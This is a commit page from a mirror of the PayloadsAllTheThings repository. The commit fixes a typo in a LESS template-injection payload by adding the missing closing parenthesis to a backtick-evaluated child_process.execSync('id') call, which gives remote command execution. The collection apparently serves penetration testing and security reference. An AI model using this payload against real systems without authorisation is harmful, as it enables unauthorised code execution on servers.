mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2026-05-07 03:51:55 +02:00
Update README.md
Fixes a typo
This commit is contained in:
parent
a0c08e4e87
commit
6841fc21d2
1 changed files with 1 additions and 1 deletions
|
|
@ -569,7 +569,7 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
|
|||
|
||||
```less
|
||||
body {
|
||||
color: `global.process.mainModule.require("child_process").execSync("id"`;
|
||||
color: `global.process.mainModule.require("child_process").execSync("id")`;
|
||||
}
|
||||
```
|
||||
|
||||
|
|
|
|||
Loading…
Reference in a new issue